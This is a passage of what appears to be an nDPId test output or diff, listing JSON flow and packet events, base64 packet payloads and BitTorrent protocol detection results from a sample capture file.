"} -00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7440000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7440000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7440000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7440000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
-00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} -00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} +01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/